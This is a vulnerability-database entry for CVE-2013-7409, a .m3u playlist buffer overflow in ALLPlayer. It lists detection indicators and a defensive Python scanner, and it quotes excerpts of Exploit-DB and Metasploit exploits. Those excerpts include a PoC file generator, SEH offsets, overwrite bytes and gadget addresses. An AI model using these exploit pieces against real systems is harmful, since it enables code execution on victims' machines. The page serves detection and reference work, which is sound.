CVE-2013-7409
Published 2014-10-30
Priority: P3 (55), high; CVSS 2.0 score 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available. EPSS: 67.94% (99.2th percentile)
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in a .m3u (playlist) file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| allplayer | allplayer | <= 5.8.1 | — |
| allplayer | allplayer | — | — |
| allplayer | allplayer | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x61\x62 (nSEH: POPAD + NOP, v5.6.2/5.7)
- bytes: \x61\x50 (nSEH: POPAD + Venetian padding, v5.8.1)
- bytes: \x11\x4d (SEH POP POP RET, ALLPlayer.exe v5.6.2)
- bytes: \x11\x66 (SEH POP POP RET, ALLPlayer.exe v5.7)
- bytes: \x50\x45 (SEH POP POP RET, ALLPlayer.exe v5.8.1)
- Detect .m3u files containing a URL entry prefixed with 'http://' followed by an abnormally long string (>300 bytes); this is the consistent exploit delivery pattern across all CVE-2013-7409 PoCs.
- ALLPlayer.exe is compiled without ASLR, Rebase, SafeSEH, or OS protections, so SEH-based exploitation is reliable; monitor for SEH chain overwrites in the ALLPlayer.exe process.
- Flag .m3u files with a total buffer size of ~5000 bytes containing unicode-encoded shellcode (alphanumeric uppercase pattern starting with 'PPYAIAIAIAIA...').
- The exploit triggers an access violation with EIP overwritten to 0x00410041 (unicode-expanded 'A'); monitor ALLPlayer.exe for access violations at addresses matching unicode-expanded ASCII patterns.
- Metasploit module bad characters for payload encoding include null bytes and high-range bytes; payloads will be AlphanumUnicodeMixed encoded, so look for long uppercase alphanumeric strings in .m3u URL entries.
- The exploit can also be triggered via the 'Open URL' menu in ALLPlayer (not just file open); monitor for ALLPlayer.exe spawning with URL arguments containing long strings.
- SEH gadget addresses (POP POP RET) differ per ALLPlayer version: 0x004d0011 for v5.6.2, 0x00660011 for v5.7, and \x50\x45 for v5.8.1. Detection rules using hardcoded gadget addresses must account for version-specific offsets.
- The Metasploit module description incorrectly references 'ALLPlayer 2.8.1' in one place but the actual target is v5.8.1 on Windows 7 SP1; version strings in module metadata may be unreliable.
- The SEH offset to overwrite is 301 bytes in v5.8.1 exploits but 303 bytes in v5.6.2/5.7 exploits; buffer size thresholds for detection should accommodate both offsets.
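A small file scanner for the file-level indicators listed above, as an added example (not taken from any of the referenced sources): it flags 'http://' playlist entries longer than 300 bytes and annotates them with the version-specific nSEH/SEH byte pairs and long uppercase alphanumeric runs. The function name scan_m3u, the 200-character run cut-off, and counting the 301/303 offsets from the end of 'http://' are assumptions.

```python
import re

URL_PREFIX = b"http://"
MAX_URL_TAIL = 300  # page's threshold: more than 300 bytes after the prefix
# nSEH+SEH byte pairs listed on this page, keyed by the offset after "http://"
# where the PoCs place them (counting from the prefix end is an assumption).
HANDLER_IOCS = {
    303: (b"\x61\x62\x11\x4d", b"\x61\x62\x11\x66"),  # v5.6.2, v5.7
    301: (b"\x61\x50\x50\x45",),                      # v5.8.1
}
UPPER_ALNUM_RUN = re.compile(rb"[A-Z0-9]{200,}")  # 200 is an assumed cut-off

def scan_m3u(data):
    """Return one finding per oversized http:// entry in raw .m3u bytes."""
    findings = []
    for lineno, line in enumerate(data.splitlines(), 1):
        entry = line.strip()
        if not entry.lower().startswith(URL_PREFIX):
            continue
        tail = entry[len(URL_PREFIX):]
        if len(tail) <= MAX_URL_TAIL:
            continue  # normal-length URL
        reasons = ["url tail %d bytes" % len(tail)]
        for offset, patterns in HANDLER_IOCS.items():
            if tail[offset:offset + 4] in patterns:
                reasons.append("known nSEH/SEH bytes at offset %d" % offset)
        if UPPER_ALNUM_RUN.search(tail):
            reasons.append("long uppercase alphanumeric run")
        findings.append({"line": lineno, "reasons": reasons})
    return findings

# Constructed samples: an ordinary playlist and one oversized filler entry.
SAMPLE_BENIGN = b"#EXTM3U\r\n#EXTINF:123,Sample\r\nhttp://media.example/a.mp3\r\n"
SAMPLE_OVERSIZED = b"#EXTM3U\r\nhttp://" + b"A" * 5000 + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", SAMPLE_BENIGN), ("oversized", SAMPLE_OVERSIZED)):
        print(name, scan_m3u(blob))
```

File scanning does not cover the 'Open URL' menu path noted above; that path needs process-level monitoring instead.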
No detection rules found.
Exploit-DB
ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
exploitdb·2014-03-05
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'ALLPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
ALLPlayer 2.8.1, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .M3U file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery
'Mike Czumak', # Original exploit
'Gabor Seljan' # Metasploit module
],
'Reference
Exploit-DB
ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2014-03-03
---
#-----------------------------------------------------------------------------#
# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH) #
# Date: Mar 1 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.allplayer.org/download/allplayer #
# Version: 5.8.1 #
# Tested on: Windows 7 SP1 #
#-----------------------------------------------------------------------------#
# This application is still vulnerable to a buffer overflow, caused by improper
# bounds checking of an URL given via menu or placed inside an M3U file.
#
# Credit to previous exploits:
# + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
# + http://www.exploit-db.com/exploits/28855/ by metacom
#!/usr/bin/perl
use strict;
use warnings;
Exploit-DB
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
exploitdb·2013-11-24
---
#!/usr/bin/perl
###############################################################################
# Exploit Title: ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)
# Date: 11-23-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ALLPlayer 5.7
# Software Link: http://www.allplayer.org/download/allplayer
# Version: 5.7
# Tested On: Windows XP SP3 and Windows 7 Pro SP1
##############################################################################
my $buffsize = 5000; # sets buffer size for consistent sized payload
my $junk = "http://" . "\x41" x 303; # offset to seh
my $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nop
my $seh = "\x11\x66"; # overwrite seh with un
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
exploitdb·2013-11-12
---
#!/usr/bin/perl
###############################################################################
# Exploit Title: ALLPlayer 5.6.2 (.m3u) - SEH Buffer Overflow (Unicode)
# Date: 10-22-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ALLPlayer 5.6.2
# Software Link: http://www.allplayer.org/download/allplayer
# Version: 5.6.2
# Tested On: Windows XP SP3
#
# Credit to metacom for finding bug and publishing original POC
# - http://www.exploit-db.com/exploits/28855/
# Shouts to corelanc0d3r and b33f for some great unicode exploit tutorials
#
# Due to unicode conversion this is a venetian shellcode exploit
# To exploit simply open the created m3u file
#####################################
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2013-10-10
---
Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2
2)Proof of Concept
junk = "http://"
buffer="\x41" * 5000
exploit = junk + buffer
try:
    out_file = open("ALLPlayer_Poc.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!"
except:
    print "Error"
3)-(DEBUG)
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALL
Metasploit
ALLPlayer M3U Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow vulnerability in ALLPlayer 5.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows 7 SP1.
No writeups or analysis indexed.
References
http://osvdb.org/show/osvdb/98283
http://packetstormsecurity.com/files/123554/ALLPlayer-5.6.2-Buffer-Overflow.html
http://packetstormsecurity.com/files/123986/ALLPlayer-5.6.2-SEH-Buffer-Overflow.html
http://packetstormsecurity.com/files/124161/ALLPlayer-5.7-Buffer-Overflow.html
http://packetstormsecurity.com/files/125519/ALLPlayer-5.8.1-Buffer-Overflow.html
http://www.exploit-db.com/exploits/28855
http://www.exploit-db.com/exploits/29549
http://www.exploit-db.com/exploits/29798
http://www.exploit-db.com/exploits/32041
http://www.exploit-db.com/exploits/32074
http://www.securityfocus.com/bid/62926